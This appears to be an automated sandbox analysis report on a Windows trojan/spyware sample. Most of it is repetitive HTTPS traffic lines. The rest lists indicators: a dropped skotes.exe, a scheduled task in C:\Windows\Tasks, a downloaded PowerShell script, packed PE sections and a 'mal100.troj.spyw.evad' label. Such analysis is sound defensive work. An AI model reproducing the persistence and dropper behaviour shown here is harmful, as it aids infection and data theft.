Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50094 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C25877 NtQuerySystemInformation, 26_2_000002B9C2C25877
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C447B2 NtQuerySystemInformation, 26_2_000002B9C2C447B2
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ECE530 6_2_00ECE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F078BB 6_2_00F078BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F08860 6_2_00F08860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F07049 6_2_00F07049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC4DE0 6_2_00EC4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F031A8 6_2_00F031A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F02D10 6_2_00F02D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F0779B 6_2_00F0779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EF7F36 6_2_00EF7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC4B30 6_2_00EC4B30
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C25877 26_2_000002B9C2C25877
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C447B2 26_2_000002B9C2C447B2
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C44EDC 26_2_000002B9C2C44EDC
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C447F2 26_2_000002B9C2C447F2
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9983289339237057
Source: file.exe Static PE information: Section: dkmnrssd ZLIB complexity 0.9946245387969589
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983289339237057
Source: skotes.exe.0.dr Static PE information: Section: dkmnrssd ZLIB complexity 0.9946245387969589
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@103/297@58/27
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KQGBYWk[1].ps1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
